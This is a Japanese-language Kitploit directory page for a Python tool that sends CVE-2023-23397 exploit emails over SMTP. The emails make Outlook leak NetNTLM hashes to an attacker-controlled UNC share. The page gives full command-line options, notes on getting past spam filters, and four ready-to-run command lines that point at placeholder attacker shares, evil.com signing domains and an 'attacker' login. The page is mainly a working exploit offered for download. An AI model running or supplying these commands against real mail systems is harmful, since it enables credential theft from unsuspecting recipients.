Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2023-23397 — CVE-2023-23397ペイロードをSMTPで送信するPythonスクリプト | Kitploit
ツール/GitHubGitHub/bronzebee/cve-2023-23397
フィッシングツールパスワード攻撃ペイロード生成エクスプロイトレッドチーミングメールセキュリティ
GitHubbronzebee/cve-2023-23397

cve-2023-23397

CVE-2023-23397ペイロードをSMTPで送信するPythonスクリプト

リポジトリを見る
1413年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-23397

このスクリプトは、CVE-2023-23397 のエクスプロイトペイロードを含む TNEF エンコードされた Outlook メールを作成し、純粋な SMTP で送信できます。COM オブジェクトや EWS は不要です。

IPM.Schedule.Meeting.Request メッセージクラスを正しく動作させることができませんでした(ミーティングとリマインダーの両方を生成しますが、何らかの理由で PidLidReminderOverride プロパティを尊重しません)。そのため、代わりに IPM.TaskRequest クラスを悪用しています。これにより、元のエクスプロイトと同様に悪意のあるミーティングリマインダーのポップアップが表示されますが、受信者はメッセージ本文やミーティングの詳細を表示できません。ただし、OWA では、このメールは予定のない通常のメッセージのように見えます。

Outlook365 16130.20218 および Outlook 2019 10395.20020 でテスト済みです。TNEF 添付ファイルとヘッダーは、外部にメールを送信する際にアンチスパムフィルターを通過しない可能性があることに注意してください。私は同じ LAN 内の Linux マシンから Exchange に直接(または Postfix リレー経由で)メールを送信してテストしたのみです。

使い方

root@kitploit:~
options:
  -h, --help            show this help message and exit
  -s SERVER, --server SERVER
                        smtp mail relay (host[:port]), default: localhost:25
  -f SENDER, --from SENDER
                        sender email address
  -t TO, --to TO        recipient email address(es), path to a file or comma-separated values
  -S SUBJECT, --subject SUBJECT
                        message subject
  -r ROOM, --room ROOM  meeting location (room name), default: Meeting Room #1
  -b BODY, --body BODY  plaintext message body (or path to file)
  --html HTML           HTML message body (or path to file)
  -p PATH, --path PATH  remote file path for NetNTLM exfiltration, e.g \\10.10.10.10\share\1.wav
  -a AUTH, --auth AUTH  username:password for AUTH command if authenticated send is required
  --codepage CODEPAGE   windows codepage (e.g. 1252=ASCII, 65001=Unicode) to encode HTML body (if any), default: 1252
  --ehlo EHLO, --helo EHLO
                        EHLO command argument (sender external hostname)
  -l LANG, --lang LANG  Content-Language header value, default: en-US
  --starttls            Use STARTTLS when communicating over plaintext SMTP
  --max-rcpts MAX_RCPTS
                        Maximum number of recipients per send attempt
  -v                    Enable debug output

DKIM message signing:
  --dkim-selector DKIM_SELECTOR
                        DKIM selector
  --dkim-key DKIM_KEY   DKIM private key file path
  --dkim-domain DKIM_DOMAIN
                        DKIM domain name, default: sender address part after @

使用例

[email protected] から [email protected] へメールを送信:

root@kitploit:~
python3 cve-2023-23397.py -s localhost:25 -p '\\xx.xx.xx.xx\share\1.wav' -f [email protected] -t [email protected] -S 'Test meeting' -b 'This is a test meeting, please ignore it.'

Opportunistic TLS とファイルからの HTML 本文を使用して複数の受信者にメールを送信:

root@kitploit:~
python3 cve-2023-23397.py -s mail.example.com:25 -p '\\xx.xx.xx.xx\share\1.wav' -f [email protected] -t [email protected],[email protected] -S 'Test meeting' -b 'This is a test meeting, please ignore it.' --html ./body.html --starttls

DKIM 署名(pip install dkimpy が必要)と EHLO コマンドのカスタムドメインを使用して、ファイルから読み込んだ受信者にメールを送信(1メッセージあたり3受信者):

root@kitploit:~
python3 cve-2023-23397.py -s mail.example.com:25 -p '\\xx.xx.xx.xx\share\1.wav' -f [email protected] -t ./recipients.txt -S 'Test Meeting' -b 'This is a test meeting, please ignore it.' --html ./body.html --starttls --max-rcpts 3 --dkim-key ./dkim.private --dkim-domain evil.com --dkim-selector default --ehlo mail.evil.com

ドメイン認証情報を使用してメールを送信:

root@kitploit:~
python3 cve-2023-23397.py -s mail.example.com:587 --auth 'EXAMPLE\attacker:12345678' -p '\\xx.xx.xx.xx\share\1.wav' -f [email protected] -t [email protected] -S 'Test meeting' -b 'This is a test meeting, please ignore it.' --starttls

クレジット

  • MDSec による元の研究
  • TNEF 関連の Python コード用 tnefparse
ツールをダウンロード